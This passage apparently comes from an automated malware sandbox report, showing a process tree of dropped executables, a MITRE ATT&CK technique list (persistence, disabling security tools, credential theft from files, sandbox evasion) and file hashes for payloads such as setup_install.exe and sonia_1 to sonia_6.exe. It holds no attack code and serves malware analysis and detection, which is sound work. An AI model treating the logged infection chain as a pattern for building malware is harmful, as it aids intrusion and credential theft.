                                                                                                                                                                                                                  taskkill /im 3A71.exe /f
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:5872
                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:5060
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3C08.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3C08.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5536
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\459E.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\459E.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6056
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\459E.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\459E.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5448
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4A24.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4A24.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5004
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5456.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5456.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4224
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5CE2.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5CE2.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3936
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4420
                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4336
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3720
                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5532
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5184
                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5272
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6032
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4800

                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        38b33d357b48f05e2e68d4f8a1db047a

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        8ce535f29afb1fa588d7152fcc59f35cefc987ba

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        5ff584af05cab237078a6630a50548fe

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        dc43343ccebe81cc23b64258c9578ba0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        026a36ebae4b1ffae91fde317cc0a66ffac8086e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        4dee1f37404a4d0181a0074bbc7bd43d87150785a0143b2835ea890e73998d25

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        6b935769cd32e87b7355bceb6b4fd3b6ff98fab4cf9b519b2910ab60d0da34422ad7ea2db452000e44cbff90c8b03a5971c2fc526b0592f23cb2a84b0e2b9fdc

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        1490692f9a611dd1b2122f67b4bed0c5

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        206448aebd8ec978766c016795954e335c44cf5c

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        b218d1e09ae945609bd48d751938dfce1f8edb8d7c386a48c3983c728bc72bd6

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        beb90598d4938cf906f2ac3e8336fe410b9e294899071d05abba7fbb09e79b495dde530bdd16d3ac5adfd24ae49fda37a80f9dcd435fba3d5bead8bd05daa2bd

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\libcurl.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\libcurlpp.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\libstdc++-6.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\libwinpthread-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_2.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_3.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_3.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_4.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_4.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_5.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_5.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_6.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_6.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                        SHA256

